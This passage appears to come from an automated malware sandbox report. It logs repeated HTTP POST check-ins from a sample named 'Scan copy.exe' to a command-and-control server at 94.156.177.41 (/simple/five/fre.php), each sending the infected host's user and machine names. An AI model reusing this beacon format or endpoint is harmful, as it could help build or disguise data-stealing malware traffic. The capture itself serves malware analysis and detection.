                            Nov 28, 2024 09:15:38.156179905 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:39.432101011 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            46192.168.2.74992294.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:39.696580887 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:39.816582918 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:41.183394909 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:40 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            47192.168.2.74992894.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:41.477293968 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:41.597338915 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:42.916821957 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:42 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            48192.168.2.74993094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:43.174424887 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:43.294625998 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:44.758248091 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:44 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            49192.168.2.74993594.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:45.020473957 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:45.140467882 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:46.605042934 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:46 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            50192.168.2.74993894.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:46.867748022 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:46.988970041 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:48.264616966 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:48 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            51192.168.2.74994394.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:48.543951988 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:48.663942099 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:50.179811001 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:49 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            52192.168.2.74994894.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:50.502160072 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:50.622383118 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:51.927736044 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:51 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            53192.168.2.74995294.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:52.208524942 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:52.328756094 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:53.836759090 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:53 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            54192.168.2.74995894.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:54.097814083 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:54.218254089 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:55.577980042 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:55 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            55192.168.2.74996294.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:55.864881039 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:55.988729954 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:57.305187941 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:57 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            56192.168.2.74996694.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:57.566478014 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:57.686634064 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:59.101942062 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:58 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            57192.168.2.74997194.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:59.366906881 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:59.487158060 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:00.808506012 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:00 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            58192.168.2.74997694.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:16:01.069273949 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:16:01.189356089 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:02.507936954 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            59192.168.2.74998294.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:16:02.769401073 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:16:02.889650106 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:04.174340963 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:03 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            60192.168.2.74998794.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:16:04.467031956 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:16:04.587141991 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:06.009777069 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:05 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            61192.168.2.74999094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:16:06.268991947 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:16:06.389002085 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:07.709157944 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:07 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            62192.168.2.74999594.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:16:07.975691080 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:16:08.095796108 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:09.414546013 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:09 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            63192.168.2.75000094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:16:09.677831888 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:16:09.797792912 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:11.218923092 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:10 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            64192.168.2.75000494.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:16:11.494457006 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:16:11.614597082 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:13.036164045 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:12 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            65192.168.2.75000994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:16:13.324951887 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:16:13.446835995 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:14.719775915 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
